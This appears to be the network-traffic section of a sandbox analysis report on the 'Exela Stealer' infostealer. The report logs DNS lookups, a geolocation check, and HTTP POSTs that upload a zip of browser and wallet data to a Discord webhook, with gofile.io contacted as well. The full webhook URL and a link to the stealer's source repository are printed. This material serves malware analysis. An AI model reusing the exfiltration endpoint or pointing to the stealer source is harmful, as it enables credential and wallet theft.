Jan 13, 2024 06:50:30.218421936 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:30.218522072 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:30.219935894 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:30.219953060 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:30.777592897 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:30.778378963 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:30.778409004 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:30.780051947 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:30.780143976 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:30.781362057 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:30.781476974 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:30.781800985 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:30.781816959 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:30.835932970 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:31.125315905 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:31.125467062 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:31.125709057 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:31.126399040 CET	49725	443	192.168.2.7	51.38.43.18
Jan 13, 2024 06:50:31.126418114 CET	443	49725	51.38.43.18	192.168.2.7
Jan 13, 2024 06:50:31.827090025 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:31.827125072 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:31.827214003 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:31.828567028 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:31.828577042 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.184056044 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.184709072 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.184740067 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.185756922 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.185838938 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.187006950 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.187068939 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.187371016 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.187387943 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.187675953 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.188087940 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.188111067 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.188168049 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.188179016 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.188647985 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.188741922 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.188756943 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.589721918 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.589807034 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.590010881 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.608134985 CET	49726	443	192.168.2.7	31.14.70.245
Jan 13, 2024 06:50:32.608160019 CET	443	49726	31.14.70.245	192.168.2.7
Jan 13, 2024 06:50:32.611407995 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.611491919 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:32.611599922 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.612469912 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.612509012 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:32.807384968 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:32.808186054 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.808221102 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:32.809242964 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:32.809320927 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.810372114 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.810446978 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:32.810898066 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.810914040 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:32.811506987 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:32.857914925 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:33.115381002 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:33.115499973 CET	443	49727	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:33.115576029 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:33.116491079 CET	49727	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:33.116523981 CET	443	49727	162.159.128.233	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2024 06:50:16.090111971 CET	62851	53	192.168.2.7	1.1.1.1
Jan 13, 2024 06:50:16.185430050 CET	53	62851	1.1.1.1	192.168.2.7
Jan 13, 2024 06:50:27.150815010 CET	53207	53	192.168.2.7	1.1.1.1
Jan 13, 2024 06:50:27.247697115 CET	53	53207	1.1.1.1	192.168.2.7
Jan 13, 2024 06:50:30.119839907 CET	60899	53	192.168.2.7	1.1.1.1
Jan 13, 2024 06:50:30.216162920 CET	53	60899	1.1.1.1	192.168.2.7
Jan 13, 2024 06:50:31.649988890 CET	54725	53	192.168.2.7	1.1.1.1
Jan 13, 2024 06:50:31.825081110 CET	53	54725	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2024 06:50:16.090111971 CET	192.168.2.7	1.1.1.1	0x86f9	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:27.150815010 CET	192.168.2.7	1.1.1.1	0x4cd	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:30.119839907 CET	192.168.2.7	1.1.1.1	0xdd0a	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:31.649988890 CET	192.168.2.7	1.1.1.1	0x2a42	Standard query (0)	store4.gofile.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 13, 2024 06:50:16.185430050 CET	1.1.1.1	192.168.2.7	0x86f9	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:27.247697115 CET	1.1.1.1	192.168.2.7	0x4cd	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:27.247697115 CET	1.1.1.1	192.168.2.7	0x4cd	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:27.247697115 CET	1.1.1.1	192.168.2.7	0x4cd	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:27.247697115 CET	1.1.1.1	192.168.2.7	0x4cd	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:27.247697115 CET	1.1.1.1	192.168.2.7	0x4cd	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:30.216162920 CET	1.1.1.1	192.168.2.7	0xdd0a	No error (0)	api.gofile.io	51.38.43.18	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:30.216162920 CET	1.1.1.1	192.168.2.7	0xdd0a	No error (0)	api.gofile.io	151.80.29.83	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:30.216162920 CET	1.1.1.1	192.168.2.7	0xdd0a	No error (0)	api.gofile.io	51.178.66.33	A (IP address)	IN (0x0001)	false
Jan 13, 2024 06:50:31.825081110 CET	1.1.1.1	192.168.2.7	0x2a42	No error (0)	store4.gofile.io	31.14.70.245	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

api.gofile.io

store4.gofile.io

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49710	208.95.112.1	80	5828	C:\Users\user\Desktop\9afaXJv52z.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2024 06:50:16.407463074 CET	124	OUT	GET /json HTTP/1.1 Host: ip-api.com Accept: / Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.9.1
Jan 13, 2024 06:50:16.598507881 CET	486	IN	HTTP/1.1 200 OK Date: Sat, 13 Jan 2024 05:50:16 GMT Content-Type: application/json; charset=utf-8 Content-Length: 309 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 43 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 22 7a 69 70 22 3a 22 35 36 39 37 32 22 2c 22 6c 61 74 22 3a 33 38 2e 38 39 34 2c 22 6c 6f 6e 22 3a 2d 37 37 2e 30 33 36 35 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 41 53 31 37 34 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"DC","regionName":"District of Columbia","city":"Washington","zip":"56972","lat":38.894,"lon":-77.0365,"timezone":"America/New_York","isp":"AS174","org":"DET Africa (Pty) LTD","as":"AS174 Cogent Communications","query":"102.165.48.42"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49720	162.159.128.233	443	5828	C:\Users\user\Desktop\9afaXJv52z.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-13 05:50:27 UTC	277	OUT	POST /api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvDF3gAtdM_zDzFY9WMg2T-- HTTP/1.1 Host: discord.com Content-Type: application/json Accept: / Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.9.1 Content-Length: 1481
2024-01-13 05:50:27 UTC	1481	OUT	Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 20 46 75 6c 6c 20 49 6e 66 6f 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "*Exela Stealer", "description": "Exela Stealer Full Info*", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer \| https://github.com/quicaxd/Exela-V2.0
2024-01-13 05:50:27 UTC	1367	IN	HTTP/1.1 404 Not Found Date: Sat, 13 Jan 2024 05:50:27 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=a7326af6b1d711ee8a71f6ae5b42f42d; Expires=Thu, 11-Jan-2029 05:50:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1705125029 x-ratelimit-reset-after: 1 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jLx5duCHgW2RQLiJj4bw%2BlbL9cagFn%2F4d4Z30bL20RQRryiSZmuboeShqYkIoOWZMIG8AWSO%2BbuvtgojH8LgU8JFU48%2BSoQA45gvY5ZZW58xoLCoEazCbC1i4TEK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=a7326af6b1d711ee8a71f6ae5b42f42d54e26f373fdf86319292142ab3e5999144397f4f80adacce011ffd6c0fb5ab76; Expires=Thu, 11-Jan-2029 05:50:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=a74299eec30796612ee1aba559cec2ac39e412a1-1705125027; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-01-13 05:50:27 UTC	205	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 61 6a 38 75 4d 37 6b 63 4a 30 4d 4e 41 6f 36 6e 7a 32 76 65 74 30 38 61 58 58 77 4c 62 41 43 78 31 6c 53 41 63 41 4d 52 39 6b 49 2d 31 37 30 35 31 32 35 30 32 37 36 33 35 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 34 62 35 63 39 64 65 39 37 36 35 62 31 36 2d 49 41 44 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=aj8uM7kcJ0MNAo6nz2vet08aXXwLbACx1lSAcAMR9kI-1705125027635-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 844b5c9de9765b16-IAD
2024-01-13 05:50:27 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49721	162.159.128.233	443	5828	C:\Users\user\Desktop\9afaXJv52z.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-13 05:50:27 UTC	276	OUT	POST /api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvDF3gAtdM_zDzFY9WMg2T-- HTTP/1.1 Host: discord.com Content-Type: application/json Accept: / Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.9.1 Content-Length: 614
2024-01-13 05:50:27 UTC	614	OUT	Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 4b 65 79 77 6f 72 64 20 52 65 73 75 6c 74 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "*Exela Stealer", "description": "Keyword Result*", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer \| https://github.com/quicaxd/Exela-V2.0"}, "thum
2024-01-13 05:50:28 UTC	1235	IN	HTTP/1.1 404 Not Found Date: Sat, 13 Jan 2024 05:50:28 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=a77e5eb6b1d711eeb084def28c803d5e; Expires=Thu, 11-Jan-2029 05:50:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1705125029 x-ratelimit-reset-after: 1 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vSHjjOFB3RExvl2kPkMVZ4w69meWRLvTViZStUOmBP6Zmky4L9s%2BBrAp%2B0frBc%2Bjjd5y4H266GvXOaMbgt9Zngs%2FabxLTXQ6juMDjTK7Tv%2BMaqVMNNrCI4PPdg1%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=a77e5eb6b1d711eeb084def28c803d5e56763b60dec7105d2cf6476e8a4f1f53993f110e60fee5b9918b2fc4551b2735; Expires=Thu, 11-Jan-2029 05:50:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2024-01-13 05:50:28 UTC	341	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 62 38 30 64 36 38 61 62 34 64 36 38 32 30 65 65 38 32 32 37 61 33 36 39 38 30 63 39 38 36 64 31 64 33 31 61 36 66 39 64 2d 31 37 30 35 31 32 35 30 32 38 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 6d 5f 37 41 4b 6e 72 4e 68 47 7a 4f 42 69 63 48 4c 51 2e 56 36 6a 55 70 34 4c 63 63 79 56 64 6a 75 66 2e 37 2e 72 67 38 67 77 2d 31 37 30 35 31 32 35 30 32 38 31 33 32 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b Data Ascii: Set-Cookie: __cfruid=b80d68ab4d6820ee8227a36980c986d1d31a6f9d-1705125028; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=Em_7AKnrNhGzOBicHLQ.V6jUp4LccyVdjuf.7.rg8gw-1705125028132-0-604800000; path=/; domain=.discord.com;
2024-01-13 05:50:28 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49722	162.159.136.232	443	5828	C:\Users\user\Desktop\9afaXJv52z.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-13 05:50:28 UTC	627	OUT	POST /api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvDF3gAtdM_zDzFY9WMg2T-- HTTP/1.1 Host: discord.com Accept: / Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.9.1 Cookie: __cfruid=a74299eec30796612ee1aba559cec2ac39e412a1-1705125027; __dcfduid=a7326af6b1d711ee8a71f6ae5b42f42d; __sdcfduid=a7326af6b1d711ee8a71f6ae5b42f42d54e26f373fdf86319292142ab3e5999144397f4f80adacce011ffd6c0fb5ab76; _cfuvid=aj8uM7kcJ0MNAo6nz2vet08aXXwLbACx1lSAcAMR9kI-1705125027635-0-604800000 Content-Length: 706209 Content-Type: multipart/form-data; boundary=56876a009fdd4d2dae10c9c80acc02a3
2024-01-13 05:50:28 UTC	36	OUT	Data Raw: 2d 2d 35 36 38 37 36 61 30 30 39 66 64 64 34 64 32 64 61 65 31 30 63 39 63 38 30 61 63 63 30 32 61 33 0d 0a Data Ascii: --56876a009fdd4d2dae10c9c80acc02a3
2024-01-13 05:50:28 UTC	164	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 30 35 39 36 39 0d 0a 0d 0a Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="19882742-CC56-1A59-9779-FB8CBFA1E29D.zip"Content-Length: 705969
2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 4c 36 2d 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 42 72 6f 77 73 65 72 73 2f 50 4b 03 04 14 00 00 00 00 00 4c 36 2d 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 00 00 08 00 4c 36 2d 58 86 c3 56 e7 0d 80 0a 00 21 c4 0a 00 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 54 fb 7b 3c d3 ff ff 3f 8e 3f 36 93 53 39 4c a2 1c 36 4c 42 91 4a c2 d8 1c 8a 51 a6 9c 0f 21 2a 44 09 61 0e 63 4e 39 9f 26 a1 b2 29 4a ce 84 90 33 73 cc a9 e4 d0 c9 f9 7c 36 73 3e fd a6 d7 f3 7d f9 7e 7e 7f b8 6c f6 78 b8 ef 61 8f eb ed 7a b8 df 6e 0b d7 d3 d5 3c c1 7a 86 15 00 80 13 18 2d 8d 3b 00 c0 48 7f 0a 01 98 8f d1 1f 6a 12 68 ea f4 07 90 db 1d 4d 35 20 bf 4b 60 f6 e8 90 9d ea 2d 55 00 28 Data Ascii: PKL6-XBrowsers/PKL6-XWallets/PKL6-XV!Display (1).pngT{<??6S9L6LBJQ!*DacN9&)J3s\|6s>}~~lxazn<z-;HjhM5 K`-U(
2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: 46 90 ed f3 95 78 ef c7 71 7b dc 15 00 2d 83 fc 80 12 8f 3f 85 dd 33 35 60 31 d1 94 de d1 b8 6b e1 e6 f1 07 03 78 1f 5f 7c 66 c7 e6 be e6 2e d2 d3 9c 07 bc 80 18 0c 73 e3 53 11 d6 5f f7 a6 93 8c c6 ba b5 d1 66 86 0c 54 a3 91 b9 f7 02 0f ae a7 cd 18 81 cd 8a 42 17 12 f4 5e d0 63 93 ce f5 9d a3 4e 24 a1 33 ef 89 ee 95 a9 bf 06 6d ca 3d 2e d6 6c 44 ec 1a 91 ee e7 45 c6 11 f3 f6 5c 6e 8f e4 42 f7 d2 25 f5 6c 0b 45 b0 b2 95 37 0a 65 ee 70 72 06 b4 7f 33 8b 01 82 34 d2 ac 8f f7 7e 8e 18 48 e5 5d ae 3e f9 ac 04 ea 13 7d a2 a0 40 23 35 83 9c 37 d5 7b 26 72 8c 59 19 83 ac c6 65 e0 e6 65 7c 4e c9 22 10 e7 74 9b c8 53 59 ba 37 bd de af f4 16 59 1a 6e 81 02 bb 55 36 e9 17 57 cf 86 e2 c4 cf 96 2f 5b 48 32 85 27 98 53 38 f1 55 cc 14 a3 fd 6f 81 a4 13 1f af 79 95 20 a5 Data Ascii: Fxq{-?35`1kx_\|f.sS_fTB^cN$3m=.lDE\nB%lE7epr34~H]>}@#57{&rYee\|N"tSY7YnU6W/[H2'S8Uoy
2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: 71 40 e9 a9 01 b9 dd 80 31 cc 79 d5 79 5b a6 ad 37 c8 cd 3d f5 41 36 98 9e 82 8a da 1f 33 68 5f 27 89 06 2c 92 05 57 5d 76 c7 ac f7 95 0f fe 5e 36 8a f3 85 92 6a 16 0d 01 69 58 a8 fb 05 d9 3d b9 80 95 d8 54 9e b5 3f 6f 38 31 4c db ff 01 d1 6b 42 84 34 21 1c 2a c7 5b bb 2b 70 37 e2 67 56 4b c4 a8 c1 01 f4 18 31 34 39 24 ae 6f 7a 93 3a 15 35 cf 53 f4 33 3b 81 55 b6 b5 7f f2 d5 1e 0b bb 53 4b 03 9b f9 bf ef 6c d0 14 bb 55 9c 4c 95 22 d4 3b 5c 0e ea 62 a1 6b 8f 6e 30 ea bf fc 5f 1f 75 4b 84 63 47 0e b0 80 03 ce 55 8b ee 7f 13 5d a6 c1 58 17 f0 6b b0 52 e6 8f e9 e2 97 9c ce a6 2a 9b f9 ae bb 7d f5 85 3b 25 60 f2 b9 2b f2 fb 96 15 ae 37 58 8a b4 08 1f dc c5 12 a5 af 90 eb 85 40 c6 27 c2 48 6f 33 8a 4c 2e 71 31 35 9a 12 4a 13 29 0d 4b 4c 0f 2e e6 69 8a 5b 2f d0 Data Ascii: q@1yy[7=A63h_',W]v^6jiX=T?o81LkB4![+p7gVK149$oz:5S3;USKlUL";\bkn0_uKcGU]XkR};%`+7X@'Ho3L.q15J)KL.i[/
